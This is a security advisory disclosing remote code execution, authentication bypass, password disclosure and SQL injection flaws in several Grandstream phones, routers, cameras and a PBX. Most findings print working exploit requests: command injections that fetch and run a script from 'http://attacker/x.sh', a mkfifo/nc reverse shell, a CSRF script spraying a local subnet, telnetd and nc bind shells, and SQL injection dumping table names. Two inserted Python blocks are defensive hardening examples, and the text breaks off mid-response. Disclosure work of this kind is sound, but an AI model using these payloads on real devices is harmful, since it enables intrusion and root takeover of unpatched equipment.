
Trustwave SpiderLabs Security Advisory TWSL2019-003:

Multiple Vulnerabilities in Grandstream Products

Published: 04/05/2019
Version: 3.0
Vendor: Grandstream (http://www.grandstream.com/)
Product: Audio/Video/VoIP/Routers/Security Cameras
Versions affected:

Pre-auth RCE:
GAC2500 -- F/W version: 1.0.3.35
GVC3202 -- F/W version: 1.0.3.51
GXP2200 -- F/W version: 1.0.3.27 (end of life product)
GXV3275 -- F/W version: 1.0.3.210
GXV3240 -- F/W version: 1.0.3.210

Post Auth RCE:
GXV3611IR_HD -- F/W version: 1.0.3.21
UCM6204 -- F/W version: 1.0.18.12
GXV3370 -- F/W version: 1.0.1.33
WP820 -- F/W version: 1.0.1.15
GWN7000 -- F/W version: 1.0.4.12
GWN7610 -- F/W version: 1.0.8.9

Product description:
Various networking and communication solutions.

Finding 1: Unauthenticated Remote Code Execution for Multiple Grandstream Devices

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10655

The following Grandstream devices are vulnerable to unauthenticated remote code
execution by the combination of a command injection vulnerability and an
authentication bypass:

- GAC2500 (Audio Conferencing Unit) firmware versions 1.0.3.35 and prior
- GVC3202 (Video Conferencing Unit) firmware versions 1.0.3.51 and prior
- GXV3240 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXV3275 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXP2200 (VoIP Phone - End of Life Product) firmware versions 1.0.3.27 and prior

The "priority" parameter of the getlogcat API endpoint is vulnerable to a
command injection vulnerability, resulting in a root shell:

Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat

When an invalid phonecookie value is supplied, the server correctly denies access
to the API endpoints:

Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat

Response:
===========================
HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49
Connection: close
Date: Tue, 04 Dec 2018 09:29:11 GMT
Server: IP Video Conferencing

Response=Error
Message=Authentication Required

However, supplying 93 A's as the "phonecookie" cookie value causes a buffer
overflow that overwrites the return value of the valid_connection function, so
it returns 41 instead of 0. This bypasses the authentication checks in place
and allows the command injection above to be triggered by an unauthenticated
user.

Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en;
phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900;
tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51;
logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat

--------------------

mnz@anima:~/projects/grandstream/gvc3202$ nc -klvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.34 44947 received!
sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAAglJliLIaeVoAC5/d7maJWH897v/QSpfywsmfwcl+ftyTN4uVdLHrfG3
yO6NOjvE0uy4t10E+OA8zsJmoa4Y7q6oROjlOZKYfizr1i1unD6KK6YpQoDcYNZo62fR/
LqenTnXG1eHCzT4RIWge6GXe6IGst+oJyY0QjF2lDowXNi0edlE= kehua@kehua-desktop
Fingerprint: md5 aa:47:1b:90:56:8f:e8:29:8d:f4:76:4b:66:fc:91:62

Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAmOqFoPWqhM0WlxSj56up/avu3DjMT2Rh8xDGLqVUjGz5Yttl2ozxZ5
ZjeraEJvIjwANK7FnCxsE1BF+9+2MBSxvu1DQyyI2Iy7TcXMP08PcCPJhfHp/
+wlCYdUnsJifvxSt49IuS09Ax0lPZuegU+UfXoBbGtIJ5Q1jC78L49pDClQMWIqlGRzMFvbA/
KpHVFuUD+zGEAHrGKiEFDRbaPTCkmpxr4RYocE6P8RDkj0Ae71FuxXvxlYUr7+ikffKAvPtwBX5YsSZ4hBj
XhX8F64StCJbVYI5CdZUBu2E4mbrirRkB8gHpAfc/Qq1/bNp+Pxi5JcZdpDDeht/6ZJI6snrbw==
jacky@jacky-Lenovo
Fingerprint: md5 9e:1e:13:ab:fa:b2:ab:97:bb:31:60:d2:49:48:15:ff
/ #

--------------------

Additionally, the lighttpd binary doesn't check that "phonecookie" is actually
in the Cookie request header, so it can be supplied in any header.

As long as the request is a so-called "simple request"
(https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS?fbclid=IwAR3gBKDUD4oK64oxXhGoFCYo-uhOYTRMIaW5IFsnxMEw6A4KPFNfJ7btLQ8#Simple_requests),
no CORS preflight occurs. XHR can set "phonecookie" in one of the headers a
simple request is allowed to carry, allowing the unauthenticated RCE to be
CSRF sprayed to gain a reverse shell on non-public-facing devices.

The following proof of concept shows how a malicious HTML page could be used to try
and CSRF this:

<script>
for (var i = 0; i < 254; i++) {
  (function(i){
    var oReq = new XMLHttpRequest();
    oReq.open("GET", "http://10.0.0."+i+"/manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543909525160 ");
    oReq.setRequestHeader("Accept","phonecookie=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";");
    oReq.send();
  })(i);
}
</script>

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/gvc3202$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.53 4444>/tmp/f;
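A defender-side counterpart to the bypass and header-placement problems in this finding, added here as an example and not code from the advisory or from Grandstream's lighttpd: a hardened valid_connection that reads the session token only from the Cookie header, bounds its length before doing anything else with it, requires the 8-hex-character shape that the valid cookies in this advisory have (an assumption made for this example), and looks it up in a session table; a second helper reports non-Cookie headers that smuggle a phonecookie= value so they can be logged. SESSIONS, MAX_TOKEN_LEN, TOKEN_RE and the function names are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed session table: token -> role. The 8-hex-character shape matches the
# valid cookies shown in this advisory ("66e67eb1", "47028427", "7672db95");
# treating that as the only acceptable shape is an assumption of this example.
SESSIONS: Dict[str, str] = {"66e67eb1": "admin"}
TOKEN_RE = re.compile(r"^[0-9a-f]{8}$")
MAX_TOKEN_LEN = 16  # hard cap, enforced before the value is examined further


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Parse a Cookie header into name -> value, dropping surrounding quotes."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        name, _, val = part.strip().partition("=")
        cookies[name.strip()] = val.strip().strip('"')
    return cookies


def valid_connection(headers: Dict[str, str]) -> Tuple[bool, str]:
    """Return (authenticated, reason).

    Only the Cookie header is consulted, the token is length-checked before any
    other handling, and it must match the expected shape and a live session.
    Every failure is a hard reject with a reason that can go straight to a log.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    cookie_header = lowered.get("cookie")
    if cookie_header is None:
        return False, "no Cookie header"
    token = parse_cookie_header(cookie_header).get("phonecookie")
    if token is None:
        return False, "phonecookie absent from Cookie header"
    if len(token) > MAX_TOKEN_LEN:
        return False, f"phonecookie too long ({len(token)} bytes)"
    if not TOKEN_RE.match(token):
        return False, "phonecookie has unexpected format"
    role = SESSIONS.get(token)
    if role is None:
        return False, "phonecookie is not a live session"
    return True, f"live session, role {role}"


def stray_phonecookie_headers(headers: Dict[str, str]) -> List[str]:
    """Names of non-Cookie headers carrying a phonecookie= value (worth logging)."""
    return sorted(name for name, value in headers.items()
                  if name.lower() != "cookie" and "phonecookie=" in value)


if __name__ == "__main__":
    # Constructed request variants mirroring the ones shown in this finding.
    cases = {
        "valid": {"Cookie": 'MyLanguage=en; phonecookie="66e67eb1"; type=admin'},
        "wrong token": {"Cookie": 'phonecookie="AABBCCDD"; type=admin'},
        "oversized token": {"Cookie": 'phonecookie="' + "A" * 93 + '"; type=admin'},
        "token in Accept": {"Accept": 'phonecookie="' + "A" * 93 + '";'},
    }
    for label, hdrs in cases.items():
        print(label, valid_connection(hdrs), stray_phonecookie_headers(hdrs))
```

The length check runs before the shape check on purpose: a fixed-size copy of the token is exactly what the 93-byte value abuses, so the bound has to hold before the value touches any buffer. The stray-header helper is a detection aid rather than an access decision; the access decision already ignores every header but Cookie.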

Finding 2: Remote Code Execution in Grandstream's GWN7000 (Gigabit VPN router)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10656, CVE-2019-10657

Grandstream's GWN7000 (Gigabit VPN router) firmware 1.0.4.12 and prior is
vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.

The "filename" parameter in the update_nds_webroot_from_tmp API call is
vulnerable to a blind command injection vulnerability resulting in a root shell:

Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 179
Connection: close
Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin

{"jsonrpc":"2.0","id":127,"method":"call","params":
["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}

--------------------

mnz@anima:~/projects/grandstream/gwn7000$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

BusyBox v1.23.2 (2017-02-24 16:54:38 CST) built-in shell (ash)

/ # id
uid=0(root) gid=0(root)
/ #

This area of functionality is only visible via the UI as admin, however the
'user' account is able to still hit this API endpoint. Additionally, it's
possible for the 'user' account to retrieve the password in plaintext for the
admin user (as well as the rest of the device settings) by the following
request. The user can then simply just login as admin.

Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 123
Connection: close
Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user

{"jsonrpc":"2.0","id":7,"method":"call","params":
["c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 9574

{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change
_required":"1","ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":
"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM
9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L
Vd@>.Wf8]V\\
N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web
_port":"443"
[...]

Finding 3: Remote Code Execution in Grandstream's GWN7610 (Wireless Access Point)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10658

Grandstream's GWN7610 (Wireless Access Point) firmware version 1.0.8.9 and prior
is vulnerable to remote code execution by exploiting a post auth command
injection vulnerability.

The "filename" parameter of the update_nds_webroot_from_tmp API call is
vulnerable to a blind command injection vulnerability.

Request:
===========================
POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 177
Connection: close
Cookie: userid=817309838e44d88e62534d563598e60a; user=admin

{"jsonrpc":"2.0","id":127,"method":"call","params":
["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52

{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}

--------------------

mnz@anima:~/projects/grandstream/gwn7610$ telnet 10.0.0.128
Trying 10.0.0.128...
Connected to 10.0.0.128.
Escape character is '^]'.

BusyBox v1.23.2 (2018-11-15 15:02:01 CST) built-in shell (ash)

/ # id
uid=0(root) gid=0(root)
/ #

The update_nds_webroot_from_tmp API call is restricted to the admin account,
however, it's possible for the 'user' account to simply retrieve the password in
plaintext for the admin user (as well as the rest of the device settings) by
issuing the following request:

Request:
===========================
POST /ubus/uci.get HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Length: 123
Connection: close
Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user

{"jsonrpc":"2.0","id":7,"method":"call","params":
["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 3973

{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
syslog_uri":"10.0.0.125","log_level":"7"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","country":"840","applied_patch":"1","
admin_password":"Password1","user_password":"Password1","pairing_key"
[...]
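Findings 2 and 3 share two authorization defects: an admin-only method that the 'user' role can still reach, and a uci get that hands any role the admin password in clear. The following is an added example, not code from the advisory or from Grandstream's ubus handlers, of a small JSON-RPC dispatcher that checks the session's role against a per-method table before anything else, redacts password and key fields from uci get results for every role, and rejects a filename argument that is not a single safe path component. METHOD_ROLES, SESSIONS, CONFIG, SECRET_KEY_RE, SAFE_FILENAME_RE and the function names are assumptions made for this example; the session ids reuse the values from the requests above and the config values are a trimmed copy of the response.

```python
import json
import re
from typing import Any, Dict, Tuple

# Role(s) allowed to call each ubus object/method. Built from what the advisory
# reports (update_nds_webroot_from_tmp is admin-only in the UI, uci get is used
# by both roles); the table itself is an assumption of this example.
METHOD_ROLES = {
    ("controller.icc", "update_nds_webroot_from_tmp"): {"admin"},
    ("uci", "get"): {"admin", "user"},
}
# Config keys that never leave the device through the API, whoever asks.
SECRET_KEY_RE = re.compile(r"(password|_key)$")
# A webroot filename must be one path component from a benign character set.
SAFE_FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Constructed session store and uci tree (session ids from the advisory's
# requests, config values trimmed from its response, pairing_key made up).
SESSIONS = {
    "c99bfb25d88ce13d021e55b2ac2014a2": "admin",
    "c847182f49ab267ff55d0870076a26c9": "user",
}
CONFIG = {
    "grandstream": {
        "general": {
            "admin_password": "Password1",
            "user_password": "Password1",
            "pairing_key": "constructed-pairing-key",
            "web_port": "443",
        }
    }
}


class RpcError(Exception):
    """Raised for any request the hardened dispatcher refuses."""


def make_call(sid: str, obj: str, method: str, args: Dict[str, Any]) -> str:
    """Build a ubus-style JSON-RPC request body like the ones in the advisory."""
    return json.dumps({"jsonrpc": "2.0", "id": 1, "method": "call",
                       "params": [sid, obj, method, args]})


def redact_config(values: Any) -> Any:
    """Recursively replace secret-looking values with a marker."""
    if isinstance(values, dict):
        return {k: ("<redacted>" if SECRET_KEY_RE.search(k) else redact_config(v))
                for k, v in values.items()}
    if isinstance(values, list):
        return [redact_config(v) for v in values]
    return values


def authorize(role: str, obj: str, method: str) -> None:
    """Deny-by-default role check: unknown methods and wrong roles both fail."""
    allowed = METHOD_ROLES.get((obj, method))
    if allowed is None:
        raise RpcError(f"unknown method {obj}.{method}")
    if role not in allowed:
        raise RpcError(f"role {role!r} may not call {obj}.{method}")


def validate_filename(name: str) -> str:
    if not SAFE_FILENAME_RE.match(name):
        raise RpcError("filename rejected: must be a single safe path component")
    return name


def handle_rpc(raw: str) -> Dict[str, Any]:
    """Dispatch one call: session lookup, role check, then argument validation."""
    sid, obj, method, args = json.loads(raw)["params"]
    role = SESSIONS.get(sid)
    if role is None:
        raise RpcError("unknown session")
    authorize(role, obj, method)
    if (obj, method) == ("uci", "get"):
        return {"values": redact_config(CONFIG.get(args["config"], {}))}
    # update_nds_webroot_from_tmp: validate the argument; a real handler would
    # then move /tmp/<name> into the webroot with a file operation, not a shell.
    return {"status": 0, "filename": validate_filename(args["filename"])}


def outcome(raw: str) -> Tuple[str, Any]:
    """('ok', result) or ('error', message), handy for logging and for tests."""
    try:
        return "ok", handle_rpc(raw)
    except RpcError as exc:
        return "error", str(exc)


if __name__ == "__main__":
    user_sid = "c847182f49ab267ff55d0870076a26c9"
    print(outcome(make_call(user_sid, "uci", "get", {"config": "grandstream"})))
    print(outcome(make_call(user_sid, "controller.icc",
                            "update_nds_webroot_from_tmp", {"filename": "hihi.html"})))
```

Two design points carry the weight here. The role check is keyed on the session the server resolved, not on the `user=` cookie the client sent, and it is deny-by-default so an unlisted method cannot be reached by anyone. Redaction happens at the API boundary for all roles; an admin who needs to rotate a password does so through a dedicated write method, never by reading the current value back.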

Finding 4: Remote Code Execution in Grandstream's GXV3370 (VoIP Phone)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10659

Grandstream's GXV3370 (VoIP Phone) firmware version 1.0.1.33 and prior is
vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.

The "priority" parameter of the getlogcat API endpoint is vulnerable to a
command injection vulnerability resulting in a root shell:

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;

Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.74
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990

----------------------------

mnz@anima:~/projects/grandstream/gxv3370$ nc -klvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.74 48349 received!
sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
GXV3370:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
GXV3370:/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAla/bO1oj2G8FOcx+uFmVGeZTkJQ5R1yJc1HphyqcE4LuEoMJ+2KWIT
mP4ADe8etTd/ZjqkL+eeN+Terj4Z+pMXk40yoRw5+R6QBW1u1XZ/4GnHWoang9+44GQ4E+ZyGD6ba8tA/
gXewS9gf/
+XRqX5A321ol4KynLsYZ9+BLXpKGGf3dUc1HSZeeV0W1UvlGLHnzR1uBFueS8h5NrUpBkIEwfxYiLB3mDpR
C0OpGrW2QK56dr7r3/DNPWZFtT3iBoiyrnv8oR/w3C2CiVTJdtnweYkl0yXMIxN/
FEGRvVXCloIiEphcyXZlZHPtzO1uI1tftW2I6WdQEIAScOlDt9PJdQ== root@ub64-QiTianM4500-N000
Fingerprint: md5 98:ef:a2:13:27:60:14:d5:6a:8b:93:7a:5b:07:08:0f
GXV3370:/ #

------------------------------

Finding 5: Remote Code Execution in Grandstream's GXV3611IR_HD (IP Camera)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10660, CVE-2019-10661

Grandstream's GXV3611IR_HD (IP Camera) firmware version 1.0.3.21 and prior is
vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.

The "logserver" parameter of the "systemlog" API endpoint is vulnerable to a
command injection vulnerability resulting in a telnet server running. The root
account has no password.

Request:
===========================
GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-p5555&loglevel=0 HTTP/1.1
Host: 10.0.0.135
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.135/Pages/syslog.html
cache-control: no-cache
context-type: text/xml;charset=utf-8
Content-Type: application/x-www-form-encodeURIComponent
If-Modified-Since: 0
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

----------------------------

mnz@anima:~/projects/grandstream/gxv3611IR_HD$ telnet 10.0.0.135 5555
Trying 10.0.0.135...
Connected to 10.0.0.135.
Escape character is '^]'.

MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774)


Linux/armv5tejl 2.6.18_pro500-davinci_evm-arm_v5t_le

localhost login: root

Welcome to MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774).

BusyBox v1.2.2 (2016.11.21-17:40+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

id: applet not found


id: applet not found
#

----------------------------

Finding 6: Remote Code Execution in Grandstream's UCM6204 (IP PBX)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10662, CVE-2019-10663

Grandstream's UCM6204 (IP PBX) firmware version 1.0.18.12 and prior is
vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.

The "file-backup" parameter of the backupUCMConfig API call is vulnerable to a
blind command injection vulnerability.

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-
1543933269; username=admin; user_id=0

action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0

action=backupUCMConfig&file-backup=backup_20181129_224405;x=$'busybox\x20nc\x20-l\x20-p\x201337\x20-e\x20sh';$x;.tar;+realtime

Then simply connect to the device for root shell:

------------------------------

mnz@anima:~/projects/grandstream/ucm6204$ nc 10.0.0.65 1337
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------

Additionally, the "sord" parameter of the listCodeblueGroup API call is
vulnerable to SQL injection.

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0

action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot noot",sqlite_version(),null;--&sidx=extension

Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 258
Connection: close
Date: Tue, 04 Dec 2018 14:40:26 GMT

{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",
"members": "1001", "tmp": "2" }, { "extension": null, "group_name": "noot noot",
"members": "3.8.5", "tmp": null } ], "total_item": 1, "total_page": 1, "page": 1 },
"status": 0 }

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-
1543933865; username=admin; user_id=0

action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null FROM sqlite_master--&sidx=extension

Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 46541
Connection: close
Date: Tue, 04 Dec 2018 14:44:04 GMT
{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",
"members": "1001", "tmp": "2" }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "language_settings", "tmp": null }, { "extension": null, "group_name":
null, "members": "sqlite_sequence", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp_settings", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp6_settings", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
{ "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp":
null }, { "extension": null, "group_name": null, "members":
"typical_firewallsettings", "tmp": null }, { "extension": null, "group_name": null,
"members": "static_defense", "tmp": null }, { "extension": null, "group_name":
